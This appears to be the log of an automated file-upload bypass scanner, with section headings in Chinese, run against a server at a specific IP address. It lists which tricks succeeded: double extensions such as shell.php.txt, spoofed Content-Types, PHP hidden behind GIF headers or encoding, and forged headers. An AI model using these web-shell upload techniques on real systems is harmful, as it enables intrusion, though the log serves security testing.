============================================================ [*] 1. 探测文件扩展名 ============================================================ [+] Allowed extension: .txt [结论] 允许的扩展名: .txt ============================================================ [*] 2. 文件名绕过技巧 (基础扩展名: .txt) ============================================================ [+] Filename trick success: 双扩展名1 | shell.php.txt ============================================================ [*] 3. Content-Type 绕过检测 (文件: test.txt) ============================================================ [+] Content-Type bypass: image/jpeg [+] Content-Type bypass: image/png [+] Content-Type bypass: image/gif [+] Content-Type bypass: image/bmp [+] Content-Type bypass: text/plain [+] Content-Type bypass: text/html [+] Content-Type bypass: text/xml [+] Content-Type bypass: application/octet-stream [+] Content-Type bypass: application/x-php [+] Content-Type bypass: application/json [+] Content-Type bypass: multipart/form-data [+] Content-Type bypass: application/x-www-form-urlencoded [+] Content-Type bypass: application/zip [+] Content-Type bypass: application/pdf [+] Content-Type bypass: invalid/type ============================================================ [*] 4. 文件内容绕过检测 (扩展名: .txt) ============================================================ [+] Content bypass: 纯文本 [+] Content bypass: GIF文件头 [+] Content bypass: PHP标签 [+] Content bypass: 短标签 [+] Content bypass: GIF+PHP [+] Content bypass: PHP+GIF [+] Content bypass: JS脚本 [+] Content bypass: HTML+PHP [+] Content bypass: Base64编码PHP [+] Content bypass: UTF-16 BOM + PHP [+] Content bypass: 注释包裹PHP [+] Content bypass: 空字节截断内容 [+] Content bypass: 超大文件 ============================================================ [*] 5. 请求头与参数绕过检测 ============================================================ [+] Header bypass set 1: {'User-Agent': 'Mozilla/5.0'} [+] Header bypass set 2: {'User-Agent': 'curl/7.68.0'} [+] Header bypass set 3: {'X-Forwarded-For': '127.0.0.1'} [+] Header bypass set 5: {'Referer': 'http://123.60.191.166/upload.php'} [+] Header bypass set 6: {'Authorization': 'Basic dXNlcjpwYXNz'} [+] Header bypass set 7: {'Cookie': 'sessionid=abc123'} ============================================================ [*] 1. 探测文件扩展名 ============================================================ [结论] 未发现允许的扩展名